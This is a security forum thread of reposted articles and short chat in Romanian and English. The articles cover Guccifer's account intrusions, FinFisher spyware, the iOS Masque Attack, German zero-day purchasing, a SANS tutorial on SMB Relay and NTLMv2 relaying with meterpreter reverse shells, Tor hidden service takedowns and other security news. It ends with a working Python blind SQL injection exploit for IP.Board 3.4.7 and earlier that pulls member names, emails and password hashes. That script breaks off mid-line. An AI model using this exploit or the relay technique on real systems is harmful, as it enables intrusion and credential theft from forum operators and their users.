Nytro

[h=2]DuckDuckGo in Firefox[/h]9 hours and 6 minutes ago posted by yegg Staff We're excited to announce that DuckDuckGo is now included as a pre-installed search option in Firefox! Today is Firefox's 10th anniversary and with it comes a special release that includes DuckDuckGo. The DuckDuckGo and Firefox communities have always had a shared interest in privacy so we're very proud to be included and can't wait to see what we can accomplish! To use DuckDuckGo in Firefox, simply download the latest version and select us from the search dropdown: Sursa: https://duck.co/blog/firefox

„Micul Fum“ ?i marele noroc. Cum a reu?it Guccifer s? sparg? contul Corinei Cre?u ?i s? bage spaima în familia Bush 11 noiembrie 2014, 16:12 de Octavian Palade Hackerul român Guccifer a devenit cunoscut dup? ce b?gat spaima în mai multe vedete ?i nume din politica româneasc? ?i interna?ional?. Acum, el se afl? în spatele gratiilor, unde a fost intervievat de reporterii „New York Times“. Într-un articol intitulat „Pentru Guccifer, s? fie hacker a fost u?or. S? fie pu?c?ria? este greu.”, Marcel-Lehel Laz?r, omul din spatele pseudonimului Guccifer, ?i-a spus povestea. Acesta a fost prins pe 22 ianuarie, anul acesta, dup? ce, timp de doi ani, a reu?it s? îi p?c?leasc? pe agen?ii FBI. „Îi a?teptam, dar ?ocul a fost foarte mare pentru mine. E greu s? fii hacker, dar e ?i mai greu s?-?i acoperi toate urmele“, a declarat Guccifer, pentru „New York Times“, din penintenciarul Arad. Acesta trebuie s? isp??easc? o sentin?? de ?apte ani. Înainte s? devin? Guccifer, nume care vine de la „stilul lui Gucci ?i lumina lui Lucifer“, Marcel a fost taximetrist. B?rbatul de 47 de ani era ?omer de câ?iva ani ?i nu avea cuno?tin?e tehnice ?i nici echipamente sofisticate. Din spatele unui computer obosit, Marcel a înv??at rapid o îndeletnicire nou?. În multe feluri, acesta a ar?tat tuturor cât de u?or po?i fi infractor pe Internet ?i cum po?i sta cu un pas în fa?a oamenilor legii dac? ai ni?te cuno?tin?e rudimentare. „Nu era cu adev?rat un hacker, ci doar un tip foarte de?tept, foarte r?bd?tor ?i foarte persistent“, a declarat Viorel Badea, procurorul care s-a ocupat de caz. Guccifer este cunoscut pentru faptul c? a f?cut publice o serie de auto-portrete realizate de fostul pre?edinte american George W. Bush, c? a ar?tat tuturor „flirturile“ dintre Corina Cre?u, membr? a Parlamentului European, ?i Colin Powel, dar ?i c? a ob?inut numeroase fotografii ?i mesaje private ale unor vedete na?ionale ?i interna?ionale. „Este vorba doar despre un român s?rac care voia s? fie faimos“, a mai declarat Badea. Laz?r a reu?it s? sparg? toate conturile ghicind parolele fiec?rei persoane vizate. În loc s? foloseasc? viru?i sofistica?i sau alte unelte specifice infractorilor cibernetici, el c?uta pe Internet cât mai multe informa?ii despre ?intele lui, informa?ii pe care le folosea pentru a r?spunde întreb?rilor de securitate necesare ob?inerii unei parole. Pentru a sparge parola Corinei Cre?u, el s-a chinuit ?ase luni de zile. „Trucul“ nu era unul nou pentru ar?dean. Laz?r a mai f?cut pu?c?rie în 2011, dup? ce, sub pseudonimul „Micul Fum“, a accesat, în acela?i fel, conturile personale ale unor vedete autohtone precum Bianca Dr?gu?anu, Laura Cosoi, Corina Caragea sau Drago? Mo?tenescu. În ciuda condamn?rii din 2011, Guccifer a dat dovad? de arogan?? ?i credea c? nu va fi niciodat? prins. Pe 6 iunie 2013, el a început s? se laude pe site-ul publica?iei americane „The Smoking Gun“, l?sând un comentariu stâlcit în limba englez?. „Nu sunt îngrijorat. Cred c? voi schimba proxiurile, voi juca table pe Yahoo, m? voi uita la televizor ?i m? voi juca cu fiica ?i cu restul familiei mele“, scria acesta. O zi mai târziu, totu?i, un anun? al ?efului SRI George Maior l-a pus pe jar. Acesta a declarat c? în curând îl va captura pe „Micul Guccifer“. Laz?r a crezut c? autorit??ile române f?cuser? leg?tura dintre „Micul Fum“ ?i „Guccifer“, a?a c? a început s?-?i fac? buc??i componentele de computer, într-o încercare disperat? de a-?i acoperi urmele. Maior a spus, mai târziu, c? în momentul în care a f?cut anun?ul, nu ?tia c? hackerul mai fusese prins în trecut ?i a recunoscut c? doar încerca s? îi minimizeze importan?a. Care a fost, totu?i, motivul pentru care Guccifer a ac?ionat cum a ac?ionat? El nu a furat niciun ban ?i nici nu a încercat s? ?antajeze pe nimeni. Se pare c? este vorba de o doz? mare de paranoia. „Lumea este condus? de un grup de conspiratori, numit Consiliul Illuminati, format din oameni foarte boga?i, familii nobile, bancheri”, s-a ap?rat acesta, într-un manifest scris de mân? pe care l-a citit reporterilor. El a spus c? nu avea niciun interes s? sparg? conturile vedetelor, ci doar s-a întâmplat s? dea peste ele încercând s? p?trund? în vie?ile private ale altor persoane. Acum, Guccifer împarte celula cu înc? patru persoane ?i nu are acces la un computer. Toate gândurile ?i teoriile conspira?ioniste le scrie de mân? într-un carne?el. „Am înc?lcat legea, dar s? execut ?apte ani într-o închisoare de maxim? securitate? Nu sunt un criminal sau un ho?. Ce am f?cut a fost drept“, a mai declarat el. Sursa: „Micul Fum“ ?i marele noroc. Cum a reu?it Guccifer s? sparg? contul Corinei Cre?u ?i s? bage spaima în familia Bush | adevarul.ro

Inside FinFisher: examining the intrusive toolset On November 10, 2014 | Posted by Sohail Abid In Blog With tags Finfisher FinFisher, a company known for making and selling a wide range of spy software to world governments for large sums of money, was hacked in the first week of August this year. The anonymous hackers leaked a 40GB torrent including the entire FinFisher support portal with obfuscated information about the buyers, list of software they had purchased, duration of each license, and their communication with the support staff. The leak helped human rights activists around the world identify the buyers, hold their governments to account for the purchases, and question the necessity of such a measure. Digital Rights Foundation also released a report detailing the evidence of Pakistan’s purchase of three software from FinFisher. The leak generated a lot of buzz and rightly so. But the coverage from mainstream media and human rights organizations was primarily limited to reporting the leak, identifying the buyers, and potential human rights implications. There hasn’t been an in-depth coverage of the scope and capabilities of the whole set of software FinFisher sells. This is what we intend to do in the current article. Understanding FinFisher FinFisher is not just a software. It’s a well-thought-out and sophisticated toolset, comprising of both software and hardware, built from the ground up to gain access to people’s private data and communications. Well thought out in the sense that each tool compliments the others in breaking into someone’s communication and sophisticated in the way the tools are generally invisible to the person. An overview of the FinFisher toolset; please click on the image to enlarge. At the time of the leak, FinFisher had 12 products available on its website: ten hardware+software solutions to break into computers and mobiles, a repository of 0-day and 1-day exploits that can be used to infect the target systems, and a training program. Among these solutions, FinSpy is the jewel of the crown. It is a remote monitoring solution that is capable to basically let the buyer see everything someone does on their computer. How Do They Break In It is easier if they, or anyone they know, have access to the computer. FinFisher offers three solutions for this situation. Two of them (FinUSB Suite and FinFly USB) involve attaching a USB drive to the computer, it does not matter if the computer is shut down or logged in, password protected or not. Once the USB is attached, the system becomes compromised. Third one (FinFireWire) is a set of adapter cards (FireWire/1394, PCMCIA and Express Card) and associated cables that, when attached, give access to a running but password protected Mac, Windows, or Linux computer. Four FinFisher solutions are designed for the situations when they don’t have physical access to someone’s computer. FinFly Net consists of a small portable computer that is attached to the router of a hotel or airport or any other “friendly” place and a laptop. Once the FinFly Net computer is The management laptop can then see internet traffic being sent and received by the people attached to the network. It can also display a fake software upgrade notification to the target, which when installed, gives complete access to that computer. Since this solution sits between all internet traffic going to and from the people connected to the network, this solution is also capable to insert a software update (Adobe Flash, for example) notification on a legitimate website. FinFly LAN can also attach spying software with legitimate files on-the-fly, while being in the same wired or wireless network. FinFly Web creates fake websites which make use of the loopholes in web browsers to instantly install FinSpy, the crown jewel in the FinFisher toolset. FinFly ISP is a hardware solution deployed at an ISP to covertly install spy software to any computer in a city or country. This solution is able to “patch” any legitimate files being downloaded by people with a spying software. Like FinFlyNet, it can also issue fake upgrade notifications for popular software like iTunes. The computer becomes compromised as soon as the downloaded files are run or software upgrade is applied. FinIntrusion Kit is an advanced toolkit that includes a customized Linux laptop with a host of adapters and antennas and can break WEP and WPA/WPA2 passphrases. What Can They See A lot. But let’s go through it step by step. IN CASE OF PHYSICAL ACCESS FinUSB toolkit can extracts login credentials from common programs like email clients, chat messengers, and remote desktop tools. It can also silently copy recently opened, created, or edited files from the computer as well as browsing history, chat logs, and wifi passwords. FinFireWire, after bypassing the login or lock screen, can recover passwords from RAM and copy all files onto an external drive. IN CASE OF CLOSE PROXIMITY LIKE AIRPORTS HOTELS FinIntrusionKit, which only requires the target to be on the same network like airport or hotel, can capture usernames and passwords being entered on websites, in addition to any other internet traffic, even if it’s on HTTPS. Your browser does not support the video tag. FinFly Net and FinFly LAN lead to the installation of FinSpy which then gives full access to all data and communications for a system. IN CASE OF NO PHYSICAL ACCESS OR PROXIMITY FinFisher provides FinFly ISP and FinFly Web to infect people who are not in close proximity. Once infected, full access to these computers will be granted. Your browser does not support the video tag. A video detailing how FinFly ISP works FinSpy: Jewel of the Crown Marketed as a ‘remote monitoring solution,’ FinSpy is the multi-purpose spying software around which the whole company revolves. It gives opens a backdoor to the infected computer allowing for live access to all files and data. It also enables access to the mic and webcam installed on the computer for “live surveillance.” It can also save an audio or video recording of each Skype call and send it to the buyer. And it can, FinFisher flaunts, “bypass almost 40 regularly tested antivirus systems.” FinSpy Control Center. Click on the image to enlarge. Note the area in red: Those are the actions that can be taken on an infected computer. Your browser does not support the video tag. We have a saying in Punjabi to seek refuge from something terrible: May this not happen even to my enemy. I’ll end this post at that. About the author: Sohail Abid researches surveillance and censorship issues at Digital Rights Foundation. Before joining DRF, he was CTO at Jumpshare, a file sharing startup from Pakistan. Sursa: Inside FinFisher: examining the intrusive toolset | Digital Rights Foundation

[h=2]Masque Attack: All Your iOS Apps Belong to Us[/h] November 10, 2014 | By Hui Xue, Tao Wei and Yulong Zhang | Exploits, Mobile Threats, Targeted Attack, Threat Intelligence, Threat Research, Vulnerabilities In July 2014, FireEye mobile security researchers have discovered that an iOS app installed using enterprise/ad-hoc provisioning could replace another genuine app installed through the App Store, as long as both apps used the same bundle identifier. This in-house app may display an arbitrary title (like “New Flappy Bird”) that lures the user to install it, but the app can replace another genuine app after installation. All apps can be replaced except iOS preinstalled apps, such as Mobile Safari. This vulnerability exists because iOS doesn't enforce matching certificates for apps with the same bundle identifier. We verified this vulnerability on iOS 7.1.1, 7.1.2, 8.0, 8.1 and 8.1.1 beta, for both jailbroken and non-jailbroken devices. An attacker can leverage this vulnerability both through wireless networks and USB. We named this attack “Masque Attack," and have created a demo video here: We have notified Apple about this vulnerability on July 26. Recently Claud Xiao discovered the “WireLurker” malware. After looking into WireLurker, we found that it started to utilize a limited form of Masque Attacks to attack iOS devices through USB. Masque Attacks can pose much bigger threats than WireLurker. Masque Attacks can replace authentic apps,such as banking and email apps, using attacker's malware through the Internet. That means the attacker can steal user's banking credentials by replacing an authentic banking app with an malware that has identical UI. Surprisingly, the malware can even access the original app's local data, which wasn't removed when the original app was replaced. These data may contain cached emails, or even login-tokens which the malware can use to log into the user's account directly. We have seen proofs that this issue started to circulate. In this situation, we consider it urgent to let the public know, since there could be existing attacks that haven’t been found by security vendors. We are also sharing mitigation measures to help iOS users better protect themselves. [h=2]Security Impacts[/h] By leveraging Masque Attack, an attacker can lure a victim to install an app with a deceiving name crafted by the attacker (like “New Angry Bird”), and the iOS system will use it to replace a legitimate app with the same bundle identifier. Masque Attack couldn't replace Apple's own platform apps such as Mobile Safari, but it can replace apps installed from app store. Masque Attack has severe security consequences: Attackers could mimic the original app’s login interface to steal the victim’s login credentials. We have confirmed this through multiple email and banking apps, where the malware uses a UI identical to the original app to trick the user into entering real login credentials and upload them to a remote server. We also found that data under the original app’s directory, such as local data caches, remained in the malware local directory after the original app was replaced. The malware can steal these sensitive data. We have confirmed this attack with email apps where the malware can steal local caches of important emails and upload them to remote server. The MDM interface couldn’t distinguish the malware from the original app, because they used the same bundle identifier. Currently there is no MDM API to get the certificate information for each app. Thus, it is difficult for MDM to detect such attacks. As mentioned in our Virus Bulletin 2014 paper “Apple without a shell - iOS under targeted attack”, apps distributed using enterprise provisioning profiles (which we call “EnPublic apps”) aren’t subjected to Apple’s review process. Therefore, the attacker can leverage iOS private APIs for powerful attacks such as background monitoring (CVE-2014-1276) and mimic iCloud’s UI to steal the user’s Apple ID and password. The attacker can also use Masque Attacks to bypass the normal app sandbox and then get root privileges by attacking known iOS vulnerabilities, such as the ones used by the Pangu team. [h=2]An Example[/h] In one of our experiments, we used an in-house app with a bundle identifier “com.google.Gmail” with a title “New Flappy Bird”. We signed this app using an enterprise certificate. When we installed this app from a website, it replaced the original Gmail app on the phone. Figure 1 Figure 1 illustrates this process. Figure 1(a) ( show the genuine Gmail app installed on the device with 22 unread emails. Figure 1© shows that the victim was lured to install an in-house app called “New Flappy Bird” from a website. Note that “New Flappy Bird” is the title for this app and the attacker can set it to an arbitrary value when preparing this app. However, this app has a bundle identifier “com.google.Gmail”. After the victim clicks “Install”, Figure 1(d) shows the in-house app was replacing the original Gmail app during the installation. Figure 1(e) shows that the original Gmail app was replaced by the in-house app. After installation, when opening the new “Gmail” app, the user will be automatically logged in with almost the same UI except for a small text box at the top saying “yes, you are pwned” which we designed to easily illustrate the attack. Attackers won’t show such courtesy in real world attacks. Meanwhile, the original authentic Gmail app’s local cached emails, which were stored as clear-text in a sqlite3 database as shown in Figure 2, are uploaded to a remote server. Note that Masque Attack happens completely over the wireless network, without relying on connecting the device to a computer. Figure 2 [h=2]Mitigations[/h] iOS users can protect themselves from Masque Attacks by following three steps: Don’t install apps from third-party sources other than Apple’s official App Store or the user’s own organization Don’t click “Install” on a pop-up from a third-party web page, as shown in Figure 1©, no matter what the pop-up says about the app. The pop-up can show attractive app titles crafted by the attacker When opening an app, if iOS shows an alert with “Untrusted App Developer”, as shown in Figure 3, click on “Don’t Trust” and uninstall the app immediately Figure 3 To check whether there are apps already installed through Masque Attacks, iOS 7 users can check the enterprise provisioning profiles installed on their iOS devices, which indicate the signing identities of possible malware delivered by Masque Attacks, by checking “Settings - > General -> Profiles” for “PROVISIONING PROFILES”. iOS 7 users can report suspicious provisioning profiles to their security department. Deleting a provisioning profile will prevent enterprise signed apps which rely on that specific profile from running. However, iOS 8 devices don’t show provisioning profiles already installed on the devices and we suggest taking extra caution when installing apps. We disclosed this vulnerability to Apple in July. Because all the existing standard protections or interfaces by Apple cannot prevent such an attack, we are asking Apple to provide more powerful interfaces to professional security vendors to protect enterprise users from these and other advanced attacks. We thank FireEye team members Noah Johnson and Andrew Osheroff for their help in producing the demo video. We also want to thank Kyrksen Storer and Lynn Thorne for their help improving this blog. Special thanks to Zheng Bu for his valuable comments and feedback. This entry was posted in Exploits, Mobile Threats, Targeted Attack, Threat Intelligence, Threat Research, Vulnerabilities and tagged iOS Vulnerability, Masque Attack, WireLurker by Hui Xue, Tao Wei and Yulong Zhang. Bookmark the permalink. Sursa: Masque Attack: All Your iOS Apps Belong to Us | FireEye Blog

German spies want millions of Euros to buy zero-day code holes Because once we own them, nobody else can ... oh, wait By Richard Chirgwin, 11 Nov 2014 Germany's spooks have come under fire for reportedly seeking funds to find bugs – not to fix them, but to hoard them. According to The Süddeutsche Zeitung, the country's BND – its federal intelligence service – wants €300 million in funding for what it calls the Strategic Technical Initiative. The Local says €4.5 million of that will be spent seeking bugs in SSL and HTTPS. The BND is shopping for zero-day bugs not to fix them, but to exploit them, the report claims, and that's drawn criticism from NGOs, the Pirate Party, and the Chaos Computer Club (CCC). German Pirate Party president Stefan Körner told The Local people should fear governments more than cyber-terror. Körner is also critical of the strategy on the basis that governments shouldn't be helping fund the grey market for security vulnerabilities, a sentiment echoed by the CCC. The CCC's Dirk Engling called the proposal legally questionable and damaging to the German economy. The SZ report also points out the serious risk that a zero-day bought on the black market will also be available for purchase by criminals for exploitation. The BND proposal would seem to put it at odds with America's NSA, which put its hand on its heart last week and promised that it shares “most” of the bugs it finds so they can be fixed. (The Register can't help but wonder if a parter agency hoarding bugs would be resisted by the NSA, or if it provides an escape clause to the promise to share bugs). The BND also wants to spend €1.1 million to set up a honey-pot, and is in the early stages of conducting social network analysis, with a prototype program slated for completion by June 2015. ® Sursa: German spies want millions of Euros to buy zero-day code holes • The Register

Ar mai fi si XenForo, dar nu stiu foarte multe despre el.

SMB Relay Demystified and NTLMv2 Pwnage with Python Posted by eskoudis Filed under Metasploit, Methodology, Passwords, Python By Mark Baggett [Editor's Note: In this _excellent_ article, Mark Baggett explains in detail how the very powerful SMBRelay attack works and offers tips for how penetration testers can operationalize around it. And, bet yet, about 2/3rds of the way in, Mark shows how you can use a Python module to perform these attacks in an environment that uses only NTLMv2, a more secure Windows authentication mechanism. Really good stuff! --Ed.] The SMB Relay attack is one of those awesome tactics that really helps penetration testers demonstrate significant risk in a target organization; it is reliable, effective, and almost always works. Even when the organization has good patch management practices, the SMB Relay attack can still get you access to critical assets. Most networks have several automated systems that connect to all the hosts on the network to perform various management tasks. For example, software inventory systems, antivirus updates, nightly backups, software updates and patch management, desktop backups, event log collectors, and other processes will routinely connect to every host on the network, login with administrative credentials and perform some management function. In some organizations, active defense systems such as Antivirus Rogue host detection will immediately attempt to login to any host that shows up on the network. These systems will typically try long lists of administrative usernames and passwords as they try to gain access to the unknown host that has mysteriously appeared on the network. SMB Relay attacks allow us to grab these authentication attempts and use them to access systems on the network. In a way, SMB Relays are the network version of Pass the Hash attacks (which Ed Skoudis described briefly in the context of psexec in his Pen Tester's Pledge article). Let's look at how these attacks work. NTLM is a challenge/response protocol. The authentication happens something like this: First, the client attempts to login and the server responds with a challenge. In effect the server says, "If you are who you say you are, then encrypt this thing (Challenge X) with your hash." Next, the client encrypts the challenge and sends back the encrypted challenge response. The server then attempts to decrypt that encrypted challenge response with the user's password hash. If it decrypts to reveal the challenge that it sent, then the user is authenticated. Here is an illustration of a challenge/response authentication. With SMB Relay attacks, the attacker inserts himself into the middle of that exchange. The attacker selects the target server he wants to authenticate to and then the attacker waits for someone on the network to authenticate to his machine. This is where rogue host detection, vulnerability scanners, and administrator scripts that automatically authenticate to hosts become a penetration tester's best friends. When the automated process connects to the attacker, he passes the authentication attempt off to his target (another system on the network, perhaps a server). The target generates a challenge and sends it back to the attacker. The attacker sends the challenge back to the originating scanning system. The scanning system encrypts the hash with the correct password hash and sends it to the attacker. The attacker passes the correctly encrypted response back to his target and successfully authenticates. This process is shown in the next illustration. The BLUE arrows are the original communications and the RED arrows are slightly modified versions of those communications that the attacker is relaying to his target, so that he can gain access to it. Although this may seem complicated, it is actually very easy to exploit.In this example, the attacker (let's say he's at IP address 10.10.12.10) wants to gain access to the server at the IP address 10.10.12.20 (perhaps a juicy file server).There is a nightly software inventory process on the server at 10.10.12.19 that inventories all the hosts on the network. Scenario Attacker IP - 10.10.12.10 Target IP - 10.10.12.20 Nightly Inventory Scanner IP - 10.10.12.19 Metasploit has an SMB Relay Module and it works wonderfully. The attacker at 10.10.12.10 sets up Metasploit as follows: I'll use a simple Windows FOR loop to simulate an administrative server scanning the network and doing inventory. On host 10.10.12.19 I run the following command. When the scanner (10.10.12.19) connects to 10.10.12.10 (our Metasploit listener) the authentication attempt is relayed to the target server (10.10.12.20). The relayed authentication happens like magic and Metasploit automatically uses the authenticated SMB session to launch the meterpreter payload on the target. Notice in the figure below that Metasploit sends an "Access Denied" back to the inventory scanner when it attempted to connect to 10.10.12.10. However, the damage is done and we get a Meterpreter shell on the attacker's machine running on the target (10.10.12.20). Today, Metasploit's SMB Relay only supports NTLMv1, so organizations can protect themselves from this attack by changing the AD policy from this setting (available in secpol.msc) ... To this... After we make the change to NTLMv2, we try Metasploit again. Now when we run the exploit, Metasploit gets a "Failed to authenticate" error message. DRAT, our dastardly plan has been foiled by modern security protocols. Metasploit has support for NTLMv2 in other exploits such as http_ntlmrelay, so I imagine this exploit will eventually support NTLMv2. But, don't worry. We've got you covered. Until then, it is PYTHON TO THE RESCUE! Two weeks ago, I showed you psexec.py in my blog post about using a Python version of psexec atSANS Penetration Testing | Psexec Python Rocks! | SANS Institute) It is a Python implementation of psexec that is distributed with the IMPACKET modules. The team writing the IMPACKET module for Python is doing some really awesome work. First of all, the modules they have written are awesome. Beyond that, they have created several example programs that demonstrate the power of their Python modules. Best of all, the SMBRELAYX.PY script that comes with IMPACKET supports NTLMv2! Sweetness, thy name is IMPACKET! Getting the script running will take a little bit of work. You'll need to download the latest version of IMPACKET and fix the module paths to get it up and running. To fix this, I put all of the examples in the same directory as the other modules and then change the import statements to reflect the correct directories. SMBRELAYX needs an executable to run on the remote host after it authenticates. What could be better than the meterpreter? Let's use msfpayload to create a Meterpreter EXE and then setup SMBRELAYX. Smbrelayx.py requires two parameters: —h is the host you are going to attack and —e is the process to launch on the remote host. You just provide those options and sit back and wait for that inventory scanner to connect to your system. Below, I show msfpayload creating the Meterpreter executable, and the invocation of smbrelayx.py: Because we are using a meterpreter reverse shell, we also have to setup Metasploit so that it is ready to receive the payload connection after it executes on the target. That is what the multi/handler exploit is for, as shown below: Now, I'll simulate the scanner by attempting to connect to the C$ of our attacker's Linux box (10.10.12.10) from the scanner server (10.10.12.19). Instead of getting back an "Access Denied" like we did from Metasploit, we get back a "System cannot find the path specified" error. I like this error message. I think a system admin might question why his username and password didn't work on a target before he would question why the path doesn't exist. The smbrelayx.py script's message back to the admin seems therefore more subtle than the Metasploit message and less likely to get noticed. Immediately we see the relay occur in the Python script. It authenticates to 10.10.12.20 and launches the meterpreter process as a service using the username and password provided by 10.10.12.19. The payload is delivered to the target after authenticating over NTLMv2 and meterpreter is launched on the target. To keep our shell, we need to quickly migrate to another more stable process (to help automate that migration, we could use one of the migration scripts available for the meterpreter). Ah, the delicious smell of a brand new meterpreter shell. And of course, because it is a Python module, you can incorporate this script into your own automated attack tools. Would you like more information about how you can create your own Python-powered attack tools? I'm sure you do! Join me for my brand-new SANS course, SEC573 Python for Penetration tester. Python for Penetration Testers | Course | Python Penetration Testing Thank you! --Mark Baggett Sursa: SANS Penetration Testing | SMB Relay Demystified and NTLMv2 Pwnage with Python | SANS Institute

Host a tor server entirely in RAM with Tor-ramdisk Hacker10 | 7 May, 2012 | Anonymity | No Comments Tor-ramdisk is a tiny Linux distribution (5MB) developed by the IT department at D’Youville College (USA) to securely host a tor proxy server in RAM memory, it can run in old diskless hardware and it will stop a forensic analysis from people stealing or seizing a tor server. In the event that a tor server is seized due to ignorance or calculated harassment, and it would not be the first time, the end user would still safe because the chained nature of the tor proxy network makes it impossible to find out someone’s computer IP by seizing a single server but other data, even if meaningless, can still be recovered, running tor in RAM is an extra security step that can help convince people that the machine is merely acting as a relay as it contains no hard drive. When a Tor-ramdisk server is powered down all the information is erased with no possibility of recovery, the tor configuration file and private encryption (torrc& secret_id_key) in between reboots can be preserved exporting and importing them using FTP or SSH making the life of a tor node operator easy. One disadvantage of running a tor node entirely in RAM memory is that it can not host hidden services as that requires hard drive space, other than it is a fully functional entry,middle or exit tor node. I would advise you to block all ports (USB,Firewire) in the server with epoxy, there are computer forensic tools that can be plugged into the USB port and make a copy of the RAM memory on the fly. You might have heard about the cold boot attack where someone with physical access to a recently switched off server or computer can still retrieve data remanence from RAM memory, this is not easy to achieve and the recovery timespan is comprised of a few seconds. Visit Tor-ramdisk homepage: Tor-ramdisk | opensource.dyc.edu Sursa: Host a tor server entirely in RAM with Tor-ramdisk | Hacker 10 - Security Hacker

ScyllaHide is an advanced open-source x64/x86 usermode Anti-Anti-Debug library. It hooks various functions in usermode to hide debugging. This tool is intended to stay in usermode (ring3). If you need kernelmode (ring0) Anti-Anti-Debug please see TitanHide https://bitbucket.org/mrexodia/titanhide. ScyllaHide supports various debuggers with plugins: OllyDbg v1 and v2 OllyDbg v1.10 x64_dbg x64_dbg or https://bitbucket.org/mrexodia/x64_dbg Hex-Rays IDA v6+ https://www.hex-rays.com/products/ida/ TitanEngine v2 https://bitbucket.org/mrexodia/titanengine-update and TitanEngine | Open Source | ReversingLabs PE x64 debugging is fully supported with plugins for x64_dbg and IDA. Please note: ScyllaHide is not limited to these debuggers. You can use the standalone commandline version of ScyllaHide. You can inject ScyllaHide in any process debugged by any debugger. More information is available in the documentation: https://bitbucket.org/NtQuery/scyllahide/downloads/ScyllaHide.pdf Source code license: GNU General Public License v3 https://www.gnu.org/licenses/gpl-3.0.en.html Special thanks to: What for his POISON Assembler source code https://tuts4you.com/download.php?view.2281 waliedassar for his blog posts waliedassar Peter Ferrie for his PDFs Homepage of Peter Ferrie MaRKuS-DJM for OllyAdvanced assembler source code MS Spy++ style Window Finder MS Spy++ style Window Finder - CodeProject Sursa: https://bitbucket.org/NtQuery/scyllahide

Deci, cine mai e interesat? Bucuresti. Avem ping-pong, biliard si "fun-room", saptamanal fotbal

[h=2]Tor Project Mulls How Feds Took Down Hidden Websites[/h] HughPickens.com writes: Jeremy Kirk writes at PC World that in the aftermath of U.S. and European law enforcement shutting down more than 400 websites (including Silk Road 2.0) which used technology that hides their true IP addresses, Tor users are asking: How did they locate the hidden services? "The first and most obvious explanation is that the operators of these hidden services failed to use adequate operational security," writes Andrew Lewman, the Tor project's executive director. For example, there are reports of one of the websites being infiltrated by undercover agents and one affidavit states various operational security errors." Another explanation is exploitation of common web bugs like SQL injections or RFIs (remote file inclusions). Many of those websites were likely quickly-coded e-shops with a big attack surface. Exploitable bugs in web applications are a common problem says Lewman adding that there are also ways to link transactions and deanonymize Bitcoin clients even if they use Tor. "Maybe the seized hidden services were running Bitcoin clients themselves and were victims of similar attacks." However the number of takedowns and the fact that Tor relays were seized could also mean that the Tor network was attacked to reveal the location of those hidden services. "Over the past few years, researchers have discovered various attacks on the Tor network. We've implemented some defenses against these attacks (PDF), but these defenses do not solve all known issues and there may even be attacks unknown to us." Another possible Tor attack vector could be the Guard Discovery attack. The guard node is the only node in the whole network that knows the actual IP address of the hidden service so if the attacker manages to compromise the guard node or somehow obtain access to it, she can launch a traffic confirmation attack to learn the identity of the hidden service. "We've been discussing various solutions to the guard discovery attack for the past many months but it's not an easy problem to fix properly. Help and feedback on the proposed designs is appreciated." According to Lewman, the task of hiding the location of low-latency web services is a very hard problem and we still don't know how to do it correctly. It seems that there are various issues that none of the current anonymous publishing designs have really solved. "In a way, it's even surprising that hidden services have survived so far. The attention they have received is minimal compared to their social value and compared to the size and determination of their adversaries." Sursa: Tor Project Mulls How Feds Took Down Hidden Websites - Slashdot

Pentru cei care se plang de vBulletin: "This year, IPS released a total of four security updates to address cross-site scripting (XSS), file inclusion and other vulnerabilities found in IP.Board."

Robolinux 7.7.1 Is Now Probably the Most Illegal Operating System – Gallery A new version of Robolinux is now ready for download By Silviu Stahie on November 10th, 2014 17:31 GMT Robolinux, a fast and easy to use Linux distribution based on Debian that uses both the GNOME and Xfce desktop environments, has been updated to version 7.7.1. Robolinux has made a name for itself by claiming that it can help users migrate from Windows to Linux without having to drop their favorite applications. A tool called Stealth VM Software has been developed to that effect and it basically lets users launch their apps in a Windows virtual environment. As you can imagine, this is not exactly easy to do and you will need a powerful operating system. Even so, it's still unclear what the legal status of the solution chosen by the developer is. As usual, each new Robolinux release is about something else, be it full hard disk encryption, Windows compatibility, or some other feature. This latest iteration of the operating system is about the integration of Popcorn Time and users’ ability to watch online movies and TV shows. The legal status of Robolinux 7.7.1 is now even more unclear The implementation of a Windows virtual environment is shady enough, especially for a Linux distro. Now, it looks like the developer has implemented Popcorn Time by default, which is illegal in many countries. Not everyone has a problem with the application, but some people might use it in countries where it’s breaking laws. "Now you can enjoy watching thousands of live streaming TV Shows & Movies instantly on your PC or laptop. You can even Chromecast them directly to your TV. The Fast as Greased Lightning Robolinux XFCE version 7.7.1 details: [Please note: The Live version password is 'live' all lower case.]" "We added Popcorn Time which requires the newest Debian 2.19 C libraries. We also added Xarchiver, so it is easier for our Users to create archive files in dozens of formats, DNS Utils, for SysAdmins & two more custom BCM Wifi Drivers. Plus all Debian upstream security updates along with the latest new and improved Debian stable Version 7.7 kernel and the newest Oracle VirtualBox version," writes the developer in the announcement. The Linux Live Creator Windows executable files have been added to the download section in the FAQ web page and Windows users will now be able to choose between Unetbootin and Linux Live Creator to install Robolinux from a USB stick. More details about the Stealth VM Software and Robolinux can be found in the official changelog. Also, you can download Robolinux 7.7.1 right now from Softpedia for both 32-bit and 64-bit architectures. Sursa: Robolinux 7.7.1 Is Now Probably the Most Illegal Operating System – Gallery - Softpedia

IP.Board <= 3.4.7 SQL Injection #!/usr/bin/env python # Sunday, November 09, 2014 - secthrowaway () safe-mail net # IP.Board <= 3.4.7 SQLi (blind, error based); # you can adapt to other types of blind injection if 'cache/sql_error_latest.cgi' is unreadable url = 'http://target.tld/forum/' ua = "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36" import sys, re # <socks> - http://sourceforge.net/projects/socksipy/ #import socks, socket #socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, "127.0.0.1", 9050) #socket.socket = socks.socksocket # </socks> import urllib2, urllib def inject(sql): try: urllib2.urlopen(urllib2.Request('%sinterface/ipsconnect/ipsconnect.php' % url, data="act=login&idType=id&id[]=-1&id[]=%s" % urllib.quote('-1) and 1!="\'" and extractvalue(1,concat(0x3a,(%s)))#\'' % sql), headers={"User-agent": ua})) except urllib2.HTTPError, e: if e.code == 503: data = urllib2.urlopen(urllib2.Request('%scache/sql_error_latest.cgi' % url, headers={"User-agent": ua})).read() txt = re.search("XPATH syntax error: '.*)'", data, re.MULTILINE) if txt is not None: return txt.group(1) sys.exit('Error [3], received unexpected data:\n%s' % data) sys.exit('Error [1]') sys.exit('Error [2]') def get(name, table, num): sqli = 'SELECT %s FROM %s LIMIT %d,1' % (name, table, num) s = int(inject('LENGTH((%s))' % sqli)) if s < 31: return inject(sqli) else: r = '' for i in range(1, s+1, 31): r += inject('SUBSTRING((%s), %i, %i)' % (sqli, i, 31)) return r n = inject('SELECT COUNT(*) FROM members') print '* Found %s users' % n for j in range(int(n)): print get('member_id', 'members', j) print get('name', 'members', j) print get('email', 'members', j) print get('CONCAT(members_pass_hash, 